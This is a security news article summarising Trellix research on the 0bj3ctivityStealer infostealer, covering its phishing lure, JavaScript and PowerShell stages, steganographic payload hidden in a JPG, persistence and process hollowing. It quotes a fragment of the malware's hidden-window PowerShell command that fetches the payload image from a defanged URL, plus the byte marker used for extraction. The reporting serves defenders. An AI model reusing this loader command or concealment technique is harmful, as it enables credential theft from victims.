Cyber Security News

0bj3ctivityStealer’s Execution Chain Unveiled With It’s New Capabilities and Exfiltration Techniques

The cybersecurity landscape continues to witness the emergence of sophisticated information-stealing malware, with 0bj3ctivityStealer representing one of the most recent and concerning additions to this threat ecosystem.

Initially discovered by HP Wolf Security experts earlier this year, this advanced stealer has demonstrated a comprehensive arsenal of data exfiltration capabilities targeting a wide variety of applications and sensitive information repositories.

The malware’s sophisticated approach to credential harvesting and system infiltration has positioned it as a significant threat to both individual users and enterprise environments.

The attack methodology employed by 0bj3ctivityStealer follows a well-orchestrated multi-stage execution chain that begins with carefully crafted phishing campaigns.

0bj3ctivityStealer execution chain (Source – Trellix)

These malicious emails, typically bearing subjects like “Quotation offer,” contain low-quality images of fabricated purchase orders designed to entice victims into clicking download links.

Malicious phishing email (Source – Trellix)

The social engineering component leverages the promise of high-quality document versions to redirect unsuspecting users to cloud storage platforms, specifically Mediafire, where the initial payload awaits deployment.

Trellix Advanced Research Center (ARC) analysts identified this novel campaign during proactive threat hunting operations, uncovering the malware’s uncommon deployment techniques that set it apart from conventional information stealers.

The researchers noted the sophisticated use of custom PowerShell scripts combined with steganographic techniques to conceal subsequent payload stages, representing an evolution in malware delivery mechanisms that successfully evades traditional detection systems.

Malicious JavaScript script (Source – Trellix)

The global impact assessment reveals that 0bj3ctivityStealer has achieved widespread distribution across multiple continents, with particularly high detection volumes concentrated in the United States, Germany, and Montenegro.

This geographic distribution pattern suggests an opportunistic rather than targeted approach, with government institutions and manufacturing companies representing the most affected sectors.

The malware’s non-discriminatory targeting methodology indicates a broad-spectrum threat that poses risks to organizations across various industries and geographic regions.

Steganographic Payload Concealment and Multi-Stage Deployment

The technical sophistication of 0bj3ctivityStealer becomes most apparent in its innovative use of steganography for payload concealment and deployment.

The initial JavaScript script, containing over 3,000 lines of code with only 60 lines representing actual malicious functionality, serves as an obfuscation mechanism that effectively hides the embedded PowerShell payload.

This obfuscated PowerShell script subsequently downloads a seemingly benign JPG image from archive.org, which contains the next execution stage hidden within its visual data.

The steganographic extraction process involves searching for a specific hexadecimal pattern (0x42 0x4D 0x32 0x55 0x36 0x00 0x00 0x00 0x00 0x00 0x36 0x00 0x00 0x00 0x28 0x00) within the downloaded image file.

Once located, the malware reads RGB pixel values to reconstruct the hidden .NET DLL payload, with the first four bytes indicating payload size and subsequent data containing the actual executable code along with junk data for additional obfuscation.

powershell -w hidden -noprofile -ep bypass -c "$bombylius='$otolite = 'VkFJ'; $bonibell =
[System.Convert]::FromBase64String($otolite);$roentgenoscopes =
[System.Text.Encoding]::UTF8.GetString($bonibell);Add-Type -AssemblyName
System.Drawing;$stouts='https://archive[.]org/download/wp4096799-lost-in-space-
wallpapers_20250610/wp4096799-lost-in-space-wallpapers.jpg';

This extracted payload functions as the VMDetector Loader, establishing persistence through scheduled task creation while simultaneously performing comprehensive virtualization and sandbox detection checks.

The loader then retrieves the final 0bj3ctivityStealer payload from a Cloudflare-managed subdomain, implementing process hollowing techniques to inject the malware into legitimate Windows processes like Regasm.exe, thereby maintaining stealth while executing its comprehensive data exfiltration operations.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

Hackers Target AI Infrastructure With RCE, Prompt Injection and API Key Theft

Hackers are actively probing AI systems, turning exposed gateways and agent tools into routes for…

3 hours ago

Hackers Make Phishing Pages Change Their Code Every Time Someone Opens Them

Hackers are making some phishing pages harder to track by changing the code delivered to…

4 hours ago

Iran-Linked Hackers Reportedly Knock UK Power Plant Offline for Four Days

A cyber incident reportedly forced a British power plant to halt operations for about four…

5 hours ago

Russian Hackers Use New HOOKEDGE Malware to Spy on European Defense and Diplomatic Targets

Russian hackers have used a new backdoor called HOOKEDGE to target defense manufacturers, government bodies,…

5 hours ago

Ransomware Gang Claims AI Can Analyze 700GB of Stolen Data Every Hour

TITAN ransomware is pairing file encryption with an ambitious claim: artificial intelligence that can sort…

5 hours ago

Hackers Compromise Hundreds of WordPress Sites to Deploy Amatera Stealer via ClickFix

A fake student resume is being used to place a remote-access tool on researchers’ Windows…

7 hours ago